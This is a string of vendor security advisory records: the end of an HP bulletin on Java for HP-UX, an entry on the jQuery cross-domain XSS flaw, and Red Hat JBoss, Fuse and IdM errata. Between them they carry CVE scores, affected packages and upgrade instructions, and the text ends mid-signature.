CVE-2013-5829 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5830 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5831 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5840 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-5842 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5843 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-5848 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-5849 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-5852 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.21 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.21 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.21.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.21.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 4 December 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners |
|
var-201801-0036
|
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. jQuery Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. JQuery is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to JQuery 3.0.0 are vulnerable. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001
JBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001
JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001
JBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9
JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001
JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001
JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001
JBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001
JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value
JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001
JBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001
JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001
JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002
JBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001
JBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001
JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003
JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2
JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001
JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
7. Description:
Red Hat Fuse provides a small-footprint, flexible, open source enterprise
service bus and integration platform. Red Hat A-MQ is a standards compliant
messaging system that is tailored for use in mission critical applications. It
includes bug fixes, which are documented in the patch notes accompanying
the package on the download page. See the download link given in the
references section below. Solution:
Before applying the update, back up your existing installation, including
all applications, configuration files, databases and database settings, and
so on.
Installation instructions are located in the download section of the
customer portal.
The References section of this erratum contains a download link (you must
log in to download the update). -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: idm:DL1 and idm:client security, bug fix, and enhancement update
Advisory ID: RHSA-2020:4670-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4670
Issue date: 2020-11-03
CVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040
CVE-2018-14042 CVE-2018-20676 CVE-2018-20677
CVE-2019-8331 CVE-2019-11358 CVE-2020-1722
CVE-2020-11022
====================================================================
1. Summary:
An update for the idm:DL1 and idm:client modules is now available for Red
Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64
3. Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity
management, and authorization solution for both traditional and cloud-based
enterprise environments.
The following packages have been upgraded to a later upstream version: ipa
(4.8.7), softhsm (2.6.0), opendnssec (2.1.6). (BZ#1759888, BZ#1818765,
BZ#1818877)
Security Fix(es):
* js-jquery: Cross-site scripting via cross-domain ajax requests
(CVE-2015-9251)
* bootstrap: XSS in the data-target attribute (CVE-2016-10735)
* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent
attribute (CVE-2018-14040)
* bootstrap: Cross-site Scripting (XSS) in the data-container property of
tooltip (CVE-2018-14042)
* bootstrap: XSS in the tooltip data-viewport attribute (CVE-2018-20676)
* bootstrap: XSS in the affix configuration target property
(CVE-2018-20677)
* bootstrap: XSS in the tooltip or popover data-template attribute
(CVE-2019-8331)
* js-jquery: Prototype pollution in object's prototype leading to denial of
service, remote code execution, or property injection (CVE-2019-11358)
* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter
method (CVE-2020-11022)
* ipa: No password length restriction leads to denial of service
(CVE-2020-1722)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.3 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests
1430365 - [RFE] Host-group names command rename
1488732 - fake_mname in named.conf is no longer effective
1585020 - Enable compat tree to provide information about AD users and groups on trust agents
1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute
1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip
1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab
1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute
1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property
1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute
1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute
1701233 - [RFE] support setting supported signature methods on the token
1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection
1746830 - Memory leak during search of idview overrides
1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch
1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming
1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI)
1759888 - Rebase OpenDNSSEC to 2.1
1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED
1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed
1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service
1801698 - [RFE] Changing default hostgroup is too easy
1802471 - SELinux policy for ipa-custodia
1809835 - RFE: ipa group-add-member: number of failed should also be emphasized
1810154 - RFE: ipa-backup should compare locally and globally installed server roles
1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time
1813330 - ipa-restore does not restart httpd
1816784 - KRA install fails if all KRA members are Hidden Replicas
1818765 - [Rebase] Rebase ipa to 4.8.6+
1818877 - [Rebase] Rebase to softhsm 2.6.0+
1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method
1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd
1831935 - AD authentication with IdM against SQL Server
1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11
1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings
1834264 - BIND rebase: rebuild against new so version
1834909 - softhsm use-after-free on process exit
1845211 - Rebase bind-dyndb-ldap to 11.3
1845537 - IPA bind configuration issue
1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed'
1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts
1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7
1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn
1849914 - FreeIPA - Utilize 256-bit AJP connector passwords
1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition
1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2
1853263 - ipa-selinux package missing
1857157 - replica install failing with avc denial for custodia component
1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master
1859213 - AVC denial during ipa-adtrust-install --add-agents
1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused'
1863616 - CA-less install does not set required permissions on KDC certificate
1866291 - EPN: enhance input validation
1866938 - ipa-epn fails to retrieve user data if some user attributes are not present
1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key'
1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed'
1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less
1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain
1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin.
1879604 - pkispawn logs files are empty
6. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source:
bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.src.rpm
custodia-0.6.0-3.module+el8.1.0+4098+f286395e.src.rpm
ipa-4.8.7-12.module+el8.3.0+8222+c1bff54a.src.rpm
ipa-4.8.7-12.module+el8.3.0+8223+6212645f.src.rpm
ipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.src.rpm
ipa-healthcheck-0.4-6.module+el8.3.0+7711+c4441980.src.rpm
opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.src.rpm
python-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.src.rpm
python-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.src.rpm
python-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.src.rpm
python-qrcode-5.1-12.module+el8.1.0+4098+f286395e.src.rpm
python-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.src.rpm
python-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.src.rpm
python-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.src.rpm
pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.src.rpm
pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.src.rpm
slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.src.rpm
softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.src.rpm
aarch64:
bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm
bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm
bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.aarch64.rpm
ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.aarch64.rpm
ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.aarch64.rpm
opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm
opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm
opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.aarch64.rpm
slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm
slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm
slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.aarch64.rpm
softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm
softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm
softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm
softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.aarch64.rpm
noarch:
custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm
ipa-client-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
ipa-client-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm
ipa-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
ipa-common-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm
ipa-healthcheck-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm
ipa-healthcheck-core-0.4-6.module+el8.3.0+7710+e2408ce4.noarch.rpm
ipa-healthcheck-core-0.4-6.module+el8.3.0+7711+c4441980.noarch.rpm
ipa-python-compat-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
ipa-python-compat-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm
ipa-selinux-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
ipa-selinux-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm
ipa-server-common-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
ipa-server-dns-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
python3-custodia-0.6.0-3.module+el8.1.0+4098+f286395e.noarch.rpm
python3-ipaclient-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
python3-ipaclient-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm
python3-ipalib-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
python3-ipalib-4.8.7-12.module+el8.3.0+8223+6212645f.noarch.rpm
python3-ipaserver-4.8.7-12.module+el8.3.0+8222+c1bff54a.noarch.rpm
python3-jwcrypto-0.5.0-1.module+el8.1.0+4098+f286395e.noarch.rpm
python3-jwcrypto-0.5.0-1.module+el8.1.0+4107+4a66eb87.noarch.rpm
python3-kdcproxy-0.4-5.module+el8.2.0+4691+a05b2456.noarch.rpm
python3-pyusb-1.0.0-9.module+el8.1.0+4098+f286395e.noarch.rpm
python3-pyusb-1.0.0-9.module+el8.1.0+4107+4a66eb87.noarch.rpm
python3-qrcode-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm
python3-qrcode-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm
python3-qrcode-core-5.1-12.module+el8.1.0+4098+f286395e.noarch.rpm
python3-qrcode-core-5.1-12.module+el8.1.0+4107+4a66eb87.noarch.rpm
python3-yubico-1.3.2-9.module+el8.1.0+4098+f286395e.noarch.rpm
python3-yubico-1.3.2-9.module+el8.1.0+4107+4a66eb87.noarch.rpm
ppc64le:
bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm
bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm
bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.ppc64le.rpm
ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.ppc64le.rpm
ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm
opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm
opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.ppc64le.rpm
slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.ppc64le.rpm
softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm
softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm
softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm
softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.ppc64le.rpm
s390x:
bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm
bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm
bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.s390x.rpm
ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.s390x.rpm
ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.s390x.rpm
opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm
opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm
opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.s390x.rpm
slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm
slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm
slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.s390x.rpm
softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm
softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm
softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm
softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.s390x.rpm
x86_64:
bind-dyndb-ldap-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm
bind-dyndb-ldap-debuginfo-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm
bind-dyndb-ldap-debugsource-11.3-1.module+el8.3.0+6993+104f8db0.x86_64.rpm
ipa-client-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-client-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-client-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-client-epn-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-client-samba-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-debuginfo-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-debugsource-4.8.7-12.module+el8.3.0+8223+6212645f.x86_64.rpm
ipa-server-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-server-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-server-trust-ad-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
ipa-server-trust-ad-debuginfo-4.8.7-12.module+el8.3.0+8222+c1bff54a.x86_64.rpm
opendnssec-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm
opendnssec-debuginfo-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm
opendnssec-debugsource-2.1.6-2.module+el8.3.0+6580+328a3362.x86_64.rpm
slapi-nis-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm
slapi-nis-debuginfo-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm
slapi-nis-debugsource-0.56.5-4.module+el8.3.0+8222+c1bff54a.x86_64.rpm
softhsm-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm
softhsm-debuginfo-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm
softhsm-debugsource-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm
softhsm-devel-2.6.0-3.module+el8.3.0+6909+fb33717d.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-9251
https://access.redhat.com/security/cve/CVE-2016-10735
https://access.redhat.com/security/cve/CVE-2018-14040
https://access.redhat.com/security/cve/CVE-2018-14042
https://access.redhat.com/security/cve/CVE-2018-20676
https://access.redhat.com/security/cve/CVE-2018-20677
https://access.redhat.com/security/cve/CVE-2019-8331
https://access.redhat.com/security/cve/CVE-2019-11358
https://access.redhat.com/security/cve/CVE-2020-1722
https://access.redhat.com/security/cve/CVE-2020-11022
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBX6I0xtzjgjWX9erEAQioFw/+IiVoE8tPMkiNgSNrk05OezzG/Cev8wXY
mTJ+clSxujruzDZ1GyYz5Ua5v4+fwEHbTKVHiite3HKbYGgV9E5H9Y/JVR75rbPN
